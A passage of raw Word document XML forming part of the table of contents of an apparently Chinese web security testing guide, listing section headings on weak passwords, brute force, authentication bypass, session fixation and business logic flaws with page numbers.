                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5C45145B"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93" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.5 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>认证信息猜解</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93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30</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="612AC95D" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434494" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.5.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>存在弱口令</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4 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>30</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="417BDA9D" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434495" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.5.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>存在暴力破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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>31</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="477E8D1B" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D">
            <w:pPr>
              <w:pStyle w:val="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434496" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.6 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>认证功能失效</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9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33</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5CF81701" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434497" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.6.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>存在空口令</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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>33</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3497652B" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434498" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.6.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>认证绕过</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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>33</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2F10FA5D" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434499" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.6.3 Oauth</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>认证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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>35</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="39619029" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434500" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.6.4 IP</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>地址伪造</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0 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>37</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6EE44E95"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01" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.7 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>认证功能滥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01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37</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="47A7943A" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434502" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.7.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>多点认证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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>37</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="02EE56B5" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434503" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.7.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>会话固定</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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>38</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0C8104DF"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04" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.8 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>业务逻辑篡改</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0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40</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4CA48B72" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434505" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.8.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>密码修改</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>重置流程跨越</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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>40</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5F867A3B" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434506" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.8.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>负值反冲</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6 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>41</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="450C1495" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434507" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.8.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>正负值对冲</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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>42</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7B7E6839" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434508" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.8.4 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>业务流程跳跃</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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
